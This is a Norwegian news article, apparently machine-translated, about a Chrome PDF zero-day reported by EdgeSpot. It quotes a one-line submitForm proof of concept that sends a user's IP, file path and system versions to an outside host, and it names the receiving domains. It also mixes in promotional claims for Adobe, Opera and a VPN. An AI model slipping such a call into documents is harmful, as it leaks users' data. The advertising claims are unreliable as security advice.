Chrome bug lar hackere samle inn brukerdata via PDF-filer

  • EdgeSpot oppdaget en spennende null-dagers sårbarhet som utnytter PDF-dokumenter i Chrome.
  • Dette sårbarhet kan skade deg ved å høste sensitive data på din PC.
  • Utforsk vår Web & Cloud-side for mer innsikt om andre verktøy og tjenester.
  • Hvis du er interessert i nettlesere, gir vi rikelig med informasjon om dem i vår Browsers Hub.
Chrome bug lar hackere samle inn brukerdata fra PDF-filene dine
Hva med å bruke den beste dokumentbehandleren?
Gjør alle dokumentene dine tilgjengelige og sikre ved hjelp av Adobe Acrobat Reader. Dette dokumenthåndteringsverktøyet lar deg også e-signere og opprette offisielle skjemaer for å spare tid på jobben. Skaff deg den til PC-en din, så kan du:
  • Åpne, skriv ut og rediger alle PDF-filer og andre filtyper
  • Fyll ut PDF-skjemaer lettere
  • Hold viktige dokumenter kryptert

Få alle apper til en spesialpris!

Verdens nr.1 dokumenthåndteringsprogramvare er nå til en bra pris, så skynd deg!

Utnyttelsesdeteksjonstjenesten EdgeSpot oppdaget en spennende Chrome null-dagers sårbarhet som utnytter PDF-dokumenter.

Sårbarheten gjør det mulig for angripere å 

høste sensitive data ved hjelp av ondsinnede PDF-dokumenter som er åpnet i Chrome.

Så snart offeret åpner de respektive PDF-filene i Google Chrome, begynner et ondsinnet program å fungere i bakgrunnen ved å samle inn brukerdata.

Dataene blir deretter videresendt til den eksterne serveren som blir kontrollert av hackerne. Du lurer kanskje på hvilke data som blir sugd av angriperne, de målretter mot følgende data på din PC:

  • IP adresse
  • Hele banen til PDF-filen på systemet
  • OS- og Chrome-versjoner

Pass på PDF-filer som er skadet av skadelig programvare

Eksperter fikk øye på det ene av de to domenene readnotify [.] com eller burpcollaborator [.] nett mottok dataene.

De avslørte at angriperne bruker this.submitForm () PDF Javascript API for å samle sensitiv informasjon fra brukerne.

Vi testet det med en minimal PoC, en enkel API-samtale som this.submitForm (‘ http://google.com/test’) får Google Chrome til å sende personopplysningene til google.com.

Denne Chrome-feilen ble utnyttet av to forskjellige sett med ondsinnede PDF-filer, begge sirkulerte i henholdsvis oktober 2017 og september 2018.

Spesielt kan de innsamlede dataene brukes av angriperne til å finjustere angrep i fremtiden. Rapporter antyder at den første batchen av filer ble samlet ved hjelp av ReadNotifys PDF-sporingstjeneste.

Brukere kan bruke tjenesten til å holde oversikt over brukervisninger. EdgeSpot har ikke delt noen detaljer angående arten til det andre settet med PDF-filer.

Hurtigtips: Bytt nettleser til Opera

I disse urolige tider blir vi angrepet med skadelig programvare, phishing og trojanere i hvert trinn, så vi må være mye mer årvåkne og være beskyttet.

Og siden dette er et spesifikt problem for Chrome, kan du unngå den trusselen og alle andre med en sikkerhetsorientert nettleser som Opera.

Denne nettleseren kommer med en innebygd annonseblokkering som ikke bare fjerner slike distraksjoner, men også blokkerer analyseskript, sporingspiksler og metoder for å samle inn dataene dine.

Og hvis du vil være helt sikker på at du holder deg unna noen fare, kan du komme deg bak den innebygde VPN tjeneste som er 100% gratis å bruke i ubegrenset tid.

Opera

Opera

Opera tilbyr den perfekte trusselsbeskyttelsen med den innebygde annonseblokkeringen og VPN-tjenesten gratis!

Få det gratis
Besøk nettsiden

Hvordan kan jeg være beskyttet mot PDF-sårbarheter?

Last ned Adobe Acrobat PRO

Adobe Acrobat PRO

Adobe og Chrome passer godt sammen når det gjelder håndtering av PDF-filer. Ved å installere Adobe Extension for Chrome, kan du se gjennom og manipulere PDF-filer etter eget ønske uten å forlate favorittleseren din.

Til tross for sin robuste struktur, kan det hende at skadelig programvare skjult i PDF-filer ikke blir oppdaget hvis du bruker standardversjonen av Reader.

Den profesjonelle versjonen anbefales for å garantere beskyttelsen din og holde dataene dine borte fra hackere.

Selv om det ikke er gratis, er prisen du betaler ganske liten for mengden ekstra funksjoner du vil glede deg over, inkludert forbedret sikkerhet for PDF-filene dine.

Det er også en 7-dagers gratis prøveperiode inkludert, slik at du kan få en smak av hele Pro-opplevelsen før du kjøper.

Adobe Acrobat PRO

Adobe Acrobat PRO

Hold deg unna skadelig programvare ved å laste ned Adobe Acrobat PRO. Den har mange flere funksjoner enn den gratis versjonen og holder dataene dine trygge.

Gratis prøveperiode
Besøk nettsiden

I tilfelle du vil være sikker mens du surfer på internett, må du skaffe deg et fullt dedikert verktøy for å sikre nettverket ditt. Installer privat internettilgang nå og sikre deg. Den beskytter PCen din mot angrep mens du surfer, maskerer IP-adressen din og blokkerer all uønsket tilgang.


Utnyttelsesgjenkjenningstjenesten EdgeSpot ønsket å varsle Chrome-brukerne om potensielle risikoer fordi oppdateringen ikke var forventet å bli utgitt i nær fremtid.

EdgeSpot rapporterte til Google om sårbarheten i fjor, og selskapet lovet å gi ut en oppdatering i slutten av april.

Du kan imidlertid vurdere å bruke en midlertidig løsning på problemet ved å se mottatte PDF-dokumenter lokalt ved hjelp av en annen leser-app.

Alternativt kan du også åpne PDF-dokumentene dine i Chrome ved å koble systemene dine fra Internett.

ofte stilte spørsmål

  • Ja det gjør det. Men hvis du vil ha et bredere utvalg, utforske våre toppvalg for Chromepersonvern utvidelser i denne komplette guiden.

  • Ther er mange utvidelser som tillater PDF-filer behandling. Sjekk ut vår utmerket guide om de beste PDF-utvidelsene for Chrome.

  • Det gjør det ikke, men du kan aktivere det raskt. Her er vår omfattende guide om hvordan du aktiverer QR-kodegeneratoren i Chrome.

Windows Defender fjerner trakasserende PC-optimaliseringsprogramvare fra 1. mars

Windows Defender fjerner trakasserende PC-optimaliseringsprogramvare fra 1. marsProblemer Med Windows ForsvarerCybersikkerhet

Mange brukere har støtt på gratis programvare som skanner systemene deres etter alle slags feil, og så viser de forskjellige alarmerende meldinger for å skremme dem til å kjøpe premiumversjonen av ...

Les mer
Windows 7 Meltdown patch gjør PC-er enda mer sårbare for trusler

Windows 7 Meltdown patch gjør PC-er enda mer sårbare for truslerWindows 7Cybersikkerhet

For noen uker siden rullet Microsoft raskt ut en lapp for å fikse Spectre og Meltdown sikkerhetsproblemer som henger igjen i Windows 7. Dessverre havnet ikke ting som planlagt fordi selskapets Melt...

Les mer
Kan NordVPN hackes?

Kan NordVPN hackes?NordvpnVpnCybersikkerhet

Hvis du er en uformell VPN-bruker, lurte du sannsynligvis på om VPN-er som er like populære som NordVPN kan hackes.Generelt sett kan enhver VPN hackes. Og det inkluderer dessverre også populære VPN...

Les mer